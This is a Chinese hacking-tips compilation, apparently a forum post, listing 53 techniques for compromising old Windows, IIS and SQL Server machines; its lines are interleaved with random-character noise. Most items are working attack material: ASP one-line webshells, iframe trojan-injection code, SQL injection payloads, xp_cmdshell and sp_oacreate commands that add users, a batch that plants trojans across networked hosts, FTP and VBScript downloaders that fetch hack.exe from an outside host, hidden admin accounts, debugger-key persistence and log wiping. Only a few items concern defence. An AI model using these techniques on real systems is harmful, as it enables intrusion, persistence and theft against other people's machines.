1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: k# b/ Z+ r3 o0 y: ocacls C:\windows\system32 /G hqw20:R- T( i$ r& i( ?& L" f
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
* s2 G" \: H' Z T恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
. r/ R% h0 Z/ w$ h8 a. M( }: O/ b$ U8 i1 ?
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。, E# R' w! z b9 h6 e
) m3 P3 [, L4 d
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 G# s. j5 Y# d0 U9 Q9 m
+ l# p4 g! ~7 G4 j" V! N7 u' Q, _4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
$ g( b3 D' a/ s" ~4 D) X
G! x1 N7 m- I' a3 S; ?8 h% G5、利用INF文件来修改注册表3 A0 N3 J! X1 A( J2 G8 h# \
[Version]# w1 \3 j5 U4 z% W* E4 Q7 q
Signature="$CHICAGO$" r; { } T: ^$ [& a5 C/ f
[Defaultinstall]
# l8 A9 Z. T- ^8 H( P Y: K" U4 LaddREG=Ating
: O+ W+ P! w8 y; S[Ating]
% }# P- Q8 f! h9 z( yHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* {" p7 |. _( F% o6 h" h/ m1 f, H9 a以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
: e' B) ~" |! o) D/ }rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
1 m+ p8 g2 P1 K其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU1 Z( A& k: ]- Z% l6 v% l
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU) {* x3 E" @4 W# u
HKEY_CURRENT_CONFIG 简写为 HKCC. N2 S p) _0 n
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
4 C+ ?' o8 I- f1 L8 R, D4 p"1"这里代表是写入或删除注册表键值中的具体数据6 ^& d% x; z) D
) l& U) T( ]$ x6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画, G$ u6 a* U. B' C7 b# G
多了一步就是在防火墙里添加个端口,然后导出其键值
2 {9 t7 z9 l4 z$ Y[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
- i# I1 I7 B! t2 H% p5 v* l# |- T/ }8 O% I6 T; R) w Y: M
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
% @4 {0 u( ?7 @+ @; { A1 x1 H在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。; ]3 R+ G1 v% n. x9 R v1 }
' @9 S% ]& r( T& x; q: J# `1 }* z
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。4 }& X/ d+ t" I, ?1 d @) G6 T5 K
, t7 @* v* x4 Q8 R2 r2 U5 v! ^9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,9 E- I) n0 ~, f; a3 w Y$ G
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
6 r4 c( J% v: @0 B" C# A; W+ A
4 J2 i. L/ W+ c6 }. N8 d+ z2 A8 w10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”) o, Y; s* c! J9 I! N1 U% A
- F, e, |9 z4 f% p11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
" ^6 m( g0 a3 Q+ k* z! I用法:xsniff –pass –hide –log pass.txt
& [' F1 Q: E* C2 {, a4 b, L ?- H/ ~* Z* t! Y
12、google搜索的艺术" k0 m0 Z* w1 T% A
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”1 {7 D+ B R, m m
或“字符串的语法错误”可以找到很多sql注入漏洞。
, z9 Q9 s2 ^8 M v- @5 y/ m3 D( V' z+ X( ?, x6 }
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。9 R3 B+ e! G3 {, a: B/ e
( V: \5 L/ a$ p* ^
14、cmd中输入 nc –vv –l –p 1987
) Q3 k& r& C$ S做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
/ @; K4 k/ s5 ]2 m6 V3 }7 @$ z P# \+ C, P+ A
15、制作T++木马,先写个ating.hta文件,内容为" r- h, p; M6 @$ m
<script language="VBScript">, R4 ~ _* K p! Z+ N# q% V
set wshshell=createobject ("wscript.shell" )+ l4 x# q6 y5 ^$ w7 z# d/ P
a=wshshell.run("你马的名称",1)
, z# ^: W2 g V- mwindow.close
: I$ j2 X! J, Z2 m' a7 b</script>
& e" f9 F5 w J5 X! Q* a5 `2 Y9 k再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。& S9 [) k6 s x( f8 _ ^
4 T5 c4 `3 r6 V0 p. l0 p: D4 d16、搜索栏里输入0 |( ` t$ @4 _& K
关键字%'and 1=1 and '%'='
! Y6 @' | |( T" F9 v关键字%'and 1=2 and '%'='0 u9 q6 F" L8 s
比较不同处 可以作为注入的特征字符9 {; G* y! i2 O/ h( s- X2 ^
! b# R& A% }' C) t2 \ p$ ?/ F
17、挂马代码<html>5 @5 Q. a, s D" S" l
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>* X1 {* g- _; N5 h
</html>4 U4 @8 R% ^7 W7 A7 B
% O: |0 d, q0 I: o8 O s8 {' j2 ~
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
, a7 h+ P8 g0 Vnet localgroup administrators还是可以看出Guest是管理员来。. H& A! F$ X) |9 c/ t, r
, D9 i0 t2 R/ ^- s) d' P; ]19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等. u+ z+ t- T0 g2 F
用法: 安装: instsrv.exe 服务名称 路径
$ \- T$ o4 I! R }卸载: instsrv.exe 服务名称 REMOVE
) R2 X+ O- V# `, e$ V" N
8 c3 X$ T3 S" R. @) b
' a W i! E- L6 ]21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉& W) d5 v3 M1 M+ m( ^! ~
不能注入时要第一时间想到%5c暴库。
4 p7 b" a$ m: d' P8 J' I
/ r. ~* H [0 c/ f3 V22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~( t! l. y, U( @; m7 C
# x6 Z7 W, |/ c# D; @; Z# s
23、缺少xp_cmdshell时
& ?. s6 Q* H& R9 E5 J7 L, y尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
+ {2 R( E+ t* o3 X假如恢复不成功,可以尝试直接加用户(针对开3389的)% o- \ x' Q0 V2 E$ p+ D8 ^
declare @o int7 U# F: M6 L( [
exec sp_oacreate 'wscript.shell',@o out) ~4 q1 J1 I6 ^- I. p0 i$ B E
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员8 R9 q# G2 k" ?7 b
2 ^, M4 |$ J* X) ] |- c$ T$ K24.批量种植木马.bat
7 [0 E- Q `* Q+ A0 y4 O" H2 k& Nfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中9 g) ^. j' Q* x5 U
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
7 |. ?5 F$ g1 l- J扫描地址.txt里每个主机名一行 用\\开头# I r# x* B! p, f; i
|" I. [0 E& b( k0 P$ a! { ~25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。; T- y, y1 [) d1 B8 C0 _
8 N! p9 l0 ~. G' R+ U4 Z( y& y26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
* C2 f4 L0 d6 r" V( H- t将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.+ D2 _* F$ p1 d9 r
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马$ j6 u- A; a& j
% g3 d# ^9 D" e# k0 b& `4 I* A27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP) i' O. j8 g3 O* t1 ]
然后用#clear logg和#clear line vty *删除日志# K/ W# A9 H" q. R
* _6 b, g0 n8 i' Q8 w/ j e& i: c# v
28、电脑坏了省去重新安装系统的方法4 [ b* h+ z, ]+ y/ ?; P& h
纯dos下执行,
$ a8 a9 d7 Y' q; h( Kxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config1 z1 w/ \% j: T5 O
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config9 `9 |9 ~9 [" _/ z3 Z% g% a
6 X; v( I; \/ U+ v3 ~+ H9 j3 A
29、解决TCP/IP筛选 在注册表里有三处,分别是:
, R2 i) S' t: q( L! a, ~/ S- cHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip0 U' i' y; a( f3 V0 Q9 i6 V
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 P3 I, L; c! ~4 w7 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( h3 l" q* n2 r% }) l! a分别用
; Z# h' i: ^( O! s8 I. pregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ M$ p, D$ o' N9 X0 V7 K. [& V
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, M5 a* e, H) }) H- C
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 o* m8 ^+ i1 u0 {: C
命令来导出注册表项
) g+ E/ u( \+ I6 K/ j& e然后把三个文件里的EnableSecurityFilters"=dword:00000001,
/ s# L+ D# U. o改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
5 s" ?# \: c3 ^) M* i: K- Vregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
2 z& \( r) m( \7 r/ i( v. v& @& n* O* L( M9 Q* R3 i" @
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U' W) ~; H5 M- D
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
' }, s3 ?* H( Z) Z7 H" }( k- L1 z+ ~
/ E) O/ O$ j: h1 b N2 G31、全手工打造开3389工具
/ I# A: p! u4 _& P1 G) ~ g打开记事本,编辑内容如下:
+ T+ `! E9 ?) F- ^% ]" Lecho [Components] > c:\sql+ g7 P' X. |5 B. \
echo TSEnable = on >> c:\sql
0 h7 W& p2 e6 ]; Hsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q% m7 S; ~8 S. Y( Y E
编辑好后存为BAT文件,上传至肉鸡,执行0 @ b% Z8 ^: h
* c& @1 X% M5 M' V D
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马! Z6 b8 {# z. v, p4 v8 g
6 I' S+ Z% i6 R/ ^
33、让服务器重启* i. r$ P8 ?8 Y! f+ Q* y
写个bat死循环:
$ I6 V% l+ y# z- P@echo off
9 ], k3 f! L; _; z, k, ~:loop1
! E/ G) I5 M! i: s' Lcls6 k/ {+ U8 m+ G; O; f" `# b m
start cmd.exe
" S% n4 z7 B* J3 s, \* U# Xgoto loop1
' P( d8 z1 P! R+ K保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
! t/ Q& D: W5 R2 P" E
8 g- T" f+ \7 b/ v, F" u) _8 W$ u34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
/ {+ F4 G: c! n5 U@echo off2 s0 w" d8 i& X0 V5 O
date /t >c:/3389.txt
3 u9 _: U) O8 mtime /t >>c:/3389.txt) ^% A; J* l+ {* c
attrib +s +h c:/3389.bat+ q q8 T& Z" @$ j5 ]2 l# T- t
attrib +s +h c:/3389.txt
6 U8 w# {" G) b" Z# H3 Znetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; S+ @# _4 ?& T- s并保存为3389.bat
. x6 n% S! G: c% M/ c# C打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
2 H; D# K) t% q/ ]8 {' S0 g& O/ w4 k X' l) Z0 E
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
1 U; k! r& K4 G; I! G1 v7 {start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)' ]0 J8 [. V4 S U5 M% y" b2 d
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。7 X( p* J k" L1 Y x; S; l
3 h( Y/ X1 w: h. D4 G36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
8 I ^: d/ r" M' ?, `$ d6 w$ decho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址4 E9 g* ^: [; S$ b/ G) W. Z
echo 你的FTP账号 >>c:\1.bat //输入账号
. H0 W! \* _: i( a: K( Pecho 你的FTP密码 >>c:\1.bat //输入密码
! J* s0 X% Q. m* Oecho bin >>c:\1.bat //登入
$ U2 K, y/ s! _: X6 g: Xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么+ E& ^; ?5 j7 h* g6 o7 R# @
echo bye >>c:\1.bat //退出
' `4 f/ o" i; A1 w. C# A: o然后执行ftp -s:c:\1.bat即可2 O2 t5 \, H4 _6 ~: C( c( b
$ U( ~, Z. G' V! \5 r. O9 k, }37、修改注册表开3389两法
+ b, @9 {$ l0 \8 R5 `(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
/ y( v: p' [% {echo Windows Registry Editor Version 5.00 >>3389.reg
. B4 I+ \9 b8 Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
& m& z4 D% O: [4 W5 Zecho "Enabled"="0" >>3389.reg
: Z7 l: \9 d( I; l. V7 m* kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows+ Z( G' e, o- M- y; A
NT\CurrentVersion\Winlogon] >>3389.reg# {1 l$ y* t2 |7 G
echo "ShutdownWithoutLogon"="0" >>3389.reg L1 l! v9 `1 v% U6 K; x ]
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]5 P: ?* j8 ^( {: e! {' \6 Y1 T9 Y; }
>>3389.reg0 s* T) Z* \7 k. Y
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg& ^/ D) O% B7 j. h+ F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]- G" y% t3 N, b3 {+ ?% t" ?
>>3389.reg
$ E% ^$ Q9 w p5 `2 uecho "TSEnabled"=dword:00000001 >>3389.reg
3 Q% {/ v$ Z* _) z5 l2 _4 [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
/ M% r" b3 G& a1 ~4 Y* hecho "Start"=dword:00000002 >>3389.reg; k- V) Q: j' ~4 g, Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]4 B6 a3 l# G, B" C
>>3389.reg
- ~; ^8 s/ ^6 ~! |echo "Start"=dword:00000002 >>3389.reg
( {# G A" T* i# Oecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg* z4 i' ^% X' q4 y# r' h% `
echo "Hotkey"="1" >>3389.reg
! |, B- b, d2 O5 J4 C: pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' \* h3 j" A0 h' `$ y
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
c+ S- g% v0 Uecho "PortNumber"=dword:00000D3D >>3389.reg
. T8 b$ W/ @: o& ]; Y- aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, D$ W3 l3 }- |) u; e o+ rServer\WinStations\RDP-Tcp] >>3389.reg
; N9 y# _3 J; I( _- t% eecho "PortNumber"=dword:00000D3D >>3389.reg
9 G" x" Q& O! s* P把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。% J8 Q! A+ ]$ Y R, z, {
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了), o! U) e+ z7 N) D1 S
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
! L7 `0 T' u- c+ p(2)winxp和win2003终端开启! s+ `2 a- J# v" ^1 q
用以下ECHO代码写一个REG文件:
; J$ F9 R8 T x, T0 s$ t1 jecho Windows Registry Editor Version 5.00>>3389.reg3 @* ]# {: E8 V1 P4 }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ K: O& l/ k* e9 D2 i7 p# @1 i' QServer]>>3389.reg
1 |& k: s$ n" O! j2 Necho "fDenyTSConnections"=dword:00000000>>3389.reg
% G) b8 c1 ~9 V7 R0 L/ Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 D5 Z$ h$ h) W! A UServer\Wds\rdpwd\Tds\tcp]>>3389.reg
& u/ h/ r8 L6 D/ _2 Techo "PortNumber"=dword:00000d3d>>3389.reg
~" Y2 {+ Z/ e% zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 W- [. m7 p9 x, LServer\WinStations\RDP-Tcp]>>3389.reg [7 i$ C, X7 T# j
echo "PortNumber"=dword:00000d3d>>3389.reg C+ m! I& q6 c, y- ~- b: q% ^
然后regedit /s 3389.reg del 3389.reg
* H3 k5 Q, {/ mXP下不论开终端还是改终端端口都不需重启& [8 J/ m% u2 a3 }9 W
9 W9 M5 z$ G# o% A: D0 w
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃: o" @) f4 {% W1 }1 B0 c2 v. ?1 i: o
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
2 J" z. u% d: f; V0 L
9 O3 o Z% Q: x$ j39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!2 H- l% J1 @# _) Z# @5 t
(1)数据库文件名应复杂并要有特殊字符
& P2 s8 i9 C* u8 N: F% r( D(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
1 C: t3 `* V7 l9 b% B8 J将conn.asp文档中的- B% O- z/ _( m2 i5 [
DBPath = Server.MapPath("数据库.mdb"): `2 |, o, ` W
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
1 H; ~' v$ l' K8 ~) H9 I
! z0 {2 Z0 l9 u$ X7 P+ I- |修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
8 W$ J$ n. G* E0 }, Y% D3 {2 `(3)不放在WEB目录里' a' p$ p8 O* s8 g
; }* G* _0 n4 t. \% N4 c40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉$ \* s5 K7 u6 y
可以写两个bat文件
* X/ S* H# I( g3 s3 t8 v) s! k& O7 J3 u@echo off
: @8 q+ G! P: J5 l; h@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
/ O( j% P7 y) n& A& e@del c:\winnt\system32\query.exe& `8 X% b4 i' k
@del %SYSTEMROOT%\system32\dllcache\query.exe
7 y2 N! T g+ a/ g( E' q4 m3 m+ j2 x@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) M; Y0 D. L& `) ~
+ |& t1 U% S) y0 V7 }@echo off( R7 \" \" }0 y9 o7 r
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
. |+ a8 d. q/ O@del c:\winnt\system32\tsadmin.exe
y) O3 c( b$ p4 V9 Z8 ^" N# U@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
' g5 H# L% T$ F2 X
1 V$ m% L) q2 t' |: F1 p41、映射对方盘符
; h% u9 j S' i. V4 A( a* ?telnet到他的机器上,
9 p d) x+ f0 m6 h" R5 j$ G0 k: u# vnet share 查看有没有默认共享 如果没有,那么就接着运行
2 I" ]5 c9 \/ D4 o, y' p4 Z! inet share c$=c:
! h. E8 U% a4 cnet share现在有c$
9 i% H* X, {* S" S在自己的机器上运行
5 U* n# ^" Q i% }8 fnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K; \3 w8 Y/ u) K
) S5 L# F& r' \5 X' d3 _
42、一些很有用的老知识3 y& I2 R; K2 N3 X4 a
type c:\boot.ini ( 查看系统版本 )
6 W1 F! F8 U$ w7 p6 I* [net start (查看已经启动的服务)5 U, R0 ]% g; f& i1 p& Q& m j
query user ( 查看当前终端连接 )0 R8 P; r1 i8 D: a4 }
net user ( 查看当前用户 )! Y8 _+ u# v |3 r5 ~2 J# A
net user 用户 密码/add ( 建立账号 )1 j" j' P! y" X, w# b
net localgroup administrators 用户 /add (提升某用户为管理员)' W8 K/ o# B( S
ipconfig -all ( 查看IP什么的 ): g! x9 }) ?3 ?( t1 p
netstat -an ( 查看当前网络状态 )' {/ F3 M1 E7 s Y0 H7 ]- B
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
( M. m i+ ?2 _% d w# {克隆时Administrator对应1F4) x2 z' o$ p6 y( I' ?0 B9 R
guest对应1F54 ?) Y) N' v2 ?. a4 D4 S$ S
tsinternetuser对应3E8
z+ Q0 }! Y6 W' Y. i
. I0 n& }% g" H43、如果对方没开3389,但是装了Remote Administrator Service- n& V% b. I4 [
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接2 {" U* U. O, U
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
1 Y& j8 f' @2 H7 T先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
" Q; |) |0 R. D) i
6 A4 a" k1 K5 V7 B44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)) r) q- U" P* J, y. K5 L
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
) l1 M! w& ?- w& @9 C; ~' x" s7 Z5 T! d: `4 A r
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)# `- Z! ?( x) k& j& Z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
5 c: q- A5 Q" ]$ U; W1 `" X^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =; _0 {4 E1 L" j7 b8 V
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
, y @" a9 `: o7 ~$ l& x6 Q! [1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs6 C; }, w' l' S
(这是完整的一句话,其中没有换行符)& M" V- R0 a' G* J; Q
然后下载:
$ ^$ x5 U# U) M# B+ b0 Zcscript down.vbs http://www.hack520.org/hack.exe hack.exe! O4 ^3 E% c, ^4 B! m
3 l0 ^1 |6 c0 d" Z46、一句话木马成功依赖于两个条件:- w* I- c1 q* p& m2 Z+ K# d
1、服务端没有禁止adodb.Stream或FSO组件
- R( X$ I S* ~+ t3 p- ^2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
3 ~, |7 P' L* F7 `% Z B: Z7 p* t4 `% @3 A4 G
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
1 E9 _7 q9 A2 P( y;alter database utsz set RECOVERY FULL--
$ ]" `1 t! L* f: I;create table cmd (a image)--
5 l0 c( u6 R% H) P1 S( a;backup log utsz to disk = 'D:\cmd' with init--
2 ~4 k7 V( |: E9 E: `7 }6 D;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
2 A; k6 ]" H7 h2 \- f;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
) @8 S! Z o; n- x4 i1 C注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
/ |' _1 x) M, d& c, r, h- n& Q1 W# g4 ^: ~
4 H, H# ~0 W5 ]9 t48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:' a; u- E( Z# b4 h( w" N
c, e6 T b9 q! U. y) n$ U用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
" i# c8 i e& s" o# H, T所有会话用 'all'。+ \& L; _$ c, {$ }. B
-s sessionid 列出会话的信息。
9 j; p7 u& l a- w-k sessionid 终止会话。& G7 N6 O( ]& y( S
-m sessionid 发送消息到会话。% r/ }& r3 P" l; r) N; H" x: |' J
$ A- B1 n3 o. R' Kconfig 配置 telnet 服务器参数。$ t. D+ y. O2 a4 _9 P
4 A. p& b% Y/ j8 U9 h* hcommon_options 为:% S7 C; Q+ _3 o
-u user 指定要使用其凭据的用户
0 W7 {4 P$ g* ]7 w9 T-p password 用户密码 R1 b. h/ p. X7 n6 V* a: b6 F
2 m& X* I! V6 s/ O
config_options 为:) r: r4 ^. x6 ?6 s1 E! \
dom = domain 设定用户的默认域
8 V. i" `/ s5 N! I+ _6 gctrlakeymap = yes|no 设定 ALT 键的映射: B" ?9 _+ \* u% @! I ~% V% Y5 q! \
timeout = hh:mm:ss 设定空闲会话超时值' k! c* d) @3 M3 ?" K
timeoutactive = yes|no 启用空闲会话。 z9 @' T5 M* g( z5 k8 e- V
maxfail = attempts 设定断开前失败的登录企图数。
; m8 {9 Q& K4 E) X. smaxconn = connections 设定最大连接数。, Y3 c& c% _' {1 F0 Q
port = number 设定 telnet 端口。
! Y- W- I% E: Gsec = [+/-]NTLM [+/-]passwd, C4 t( Q& p7 n1 J4 A% }
设定身份验证机构* y1 m T+ J9 J9 D) t$ H
fname = file 指定审计文件名。
& L3 T5 N; P: g9 P# B u8 P% nfsize = size 指定审计文件的最大尺寸(MB)。
8 h6 d' z3 X0 l: Emode = console|stream 指定操作模式。' V0 `3 t5 {3 P0 A; p
auditlocation = eventlog|file|both
$ Y5 Y8 z* ~2 Q5 A8 ]+ r指定记录地点
, D' h) o9 L N7 h( L* E* Kaudit = [+/-]user [+/-]fail [+/-]admin
9 p" ]( g2 I- m, K n
& R& L0 ?$ _4 t. Z" [; ~49、例如:在IE上访问:8 X0 S! z; c# U7 \5 \9 J, i
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/* S/ Z. {( k, u
hack.txt里面的代码是:
; w" o0 S% M, _$ o8 e" O0 t<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">. f! Z) O* [( {$ ~( [/ U+ s* H+ O
把这个hack.txt发到你空间就可以了!
7 r" b6 ?& I& I% r2 L( B这个可以利用来做网马哦!; {. ^' \+ ~& s. A/ Y( R
% N4 h" D7 u/ [% p2 r; V
50、autorun的病毒可以通过手动限制!
6 `1 m( j1 R/ T) @1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!" I# b H% L0 r$ b
2,打开盘符用右键打开!切忌双击盘符~$ F9 [; Z: \0 `* S3 N, U7 g0 f
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!) h, l$ ]# p& ?9 j) y& O
1 ?( T& s' v* t' t51、log备份时的一句话木马:
3 l2 \9 H$ B8 Y2 h0 }a).<%%25Execute(request("go"))%%25>+ u. s% D- v0 g8 f0 ~4 G4 `% @
b).<%Execute(request("go"))%>
$ \5 A( V* ?) `" \6 n$ {0 \c).%><%execute request("go")%><%
4 D8 Q$ V7 F2 s$ c; fd).<script language=VBScript runat=server>execute request("sb")</Script>
2 E8 g) p) q- G k" M2 ]* Ue).<%25Execute(request("l"))%25>
6 R, \$ H5 v( I0 e' n: [: B/ f8 P+ jf).<%if request("cmd")<>"" then execute request("pass")%>; g! @+ L* m2 {9 B7 D" F
) I1 c$ s% b2 `52、at "12:17" /interactive cmd
4 z7 E* Z; j' W6 q0 u执行后可以用AT命令查看新加的任务
, v: y# N+ b( R9 d# B5 l用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。" K Y" I$ h4 j8 M8 {: z
. M" o5 I I ^ Q
53、隐藏ASP后门的两种方法
, ?# ^; e( U C1、建立非标准目录:mkdir images..\
